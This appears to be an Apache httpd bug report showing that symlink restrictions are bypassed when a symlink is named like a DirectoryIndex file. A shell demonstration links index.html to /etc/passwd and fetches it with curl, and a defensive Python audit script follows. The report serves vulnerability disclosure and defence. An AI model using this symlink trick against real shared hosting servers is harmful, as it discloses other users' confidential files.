https://issues.apache.org/bugzilla/show_bug.cgi?id=47337
Summary: FollowSymlinks and SymLinksIfOwnerMatch are ignored if
a symlink's name conforms to DirectoryIndex
Product: Apache httpd-2
Version: 2.2.11
Platform: All
OS/Version: Linux
Status: NEW
Severity: major
Priority: P2
Component: Core
AssignedTo: [email protected]
ReportedBy: [email protected]
Apache ignores the SymLinksIfOwnerMatch and FollowSymlinks directives if the name
of the symlink in question matches a valid value for DirectoryIndex.
Expected behaviour: 403 Forbidden, the symlink's target should not be
delivered.
Observed behaviour: 200 OK, the symlink's target is delivered to the client.
Impact: this could prove a security problem, especially in shared hosting
environments. It is possible to disclose confidential information by
arbitrarily creating symlinks to files readable by the apache process.
Demonstration:
--- snip ---
x...@v1384:~/dev/test$ ls -la . /etc/passwd
-rw-r--r-- 1 root root 1570 2009-03-23 11:06 /etc/passwd
.:
total 3
drwxr-xr-x 2 xy xy 1024 2009-06-09 16:50 .
drwxr-xr-x 5 xy xy 1024 2009-06-09 16:31 ..
-rw-r--r-- 1 xy xy 29 2009-06-09 16:48 .htaccess
lrwxrwxrwx 1 xy xy 11 2009-06-09 16:47 index.html -> /etc/passwd
lrwxrwxrwx 1 xy xy 11 2009-06-09 16:50 symlink -> /etc/passwd
x...@v1384:~/dev/test$ cat .htaccess
Options SymLinksIfOwnerMatch
x...@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/symlink
HTTP/1.1 403 Forbidden
Date: Tue, 09 Jun 2009 15:36:52 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1
x...@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/index.html
HTTP/1.1 403 Forbidden
Date: Tue, 09 Jun 2009 15:37:00 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1
x...@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/
HTTP/1.1 200 OK
Date: Tue, 09 Jun 2009 15:37:03 GMT
Server: Apache
Last-Modified: Mon, 23 Mar 2009 10:06:27 GMT
ETag: "f979d3e-622-465c66b6bcec0"
Accept-Ranges: bytes
Content-Length: 1570
Content-Type: text/html
--- snip ---
The above behaviour is the same if FollowSymlinks, instead of
SymLinksIfOwnerMatch, is used to restrict access.
This is reproducible on Apache 2.2.9 (Debian Stable) and 2.2.11 (Gentoo ~x86).
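An audit sketch for the condition reported above, added here as an example and not part of the original report or of Apache httpd: it walks a document root and lists symlinks whose name is a DirectoryIndex candidate, recording whether the link owner and target owner match. The function name, the INDEX_NAMES list and the sample tree are assumptions; set INDEX_NAMES to the server's actual DirectoryIndex value.

```python
import os
import tempfile

# Assumption: set this to the DirectoryIndex value of the server being audited.
INDEX_NAMES = ("index.html", "index.htm", "index.php")


def audit_index_symlinks(docroot, index_names=INDEX_NAMES):
    """List symlinks under docroot whose name is a DirectoryIndex candidate.

    Each finding records whether the link owner and target owner match, the
    condition SymLinksIfOwnerMatch is meant to enforce.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(docroot, followlinks=False):
        # Symlinks to directories show up in dirnames, all others in filenames.
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if name not in index_names or not os.path.islink(path):
                continue
            link_uid = os.lstat(path).st_uid       # owner of the link itself
            try:
                target_uid = os.stat(path).st_uid  # owner of what it resolves to
            except OSError:
                target_uid = None                  # dangling or unreadable target
            findings.append({
                "path": path,
                "target": os.readlink(path),
                "link_uid": link_uid,
                "target_uid": target_uid,
                "owner_match": target_uid is not None and link_uid == target_uid,
            })
    return sorted(findings, key=lambda f: f["path"])


if __name__ == "__main__":
    # Constructed sample tree, mirroring the directory listing in the report.
    with tempfile.TemporaryDirectory() as root:
        os.symlink("/etc/passwd", os.path.join(root, "index.html"))
        os.symlink("/etc/passwd", os.path.join(root, "symlink"))
        for f in audit_index_symlinks(root):
            verdict = "owner match" if f["owner_match"] else "OWNER MISMATCH"
            print(f"{f['path']} -> {f['target']} [{verdict}]")
```

On a host where symlinks are meant to be denied outright, every finding is relevant regardless of the owner_match field.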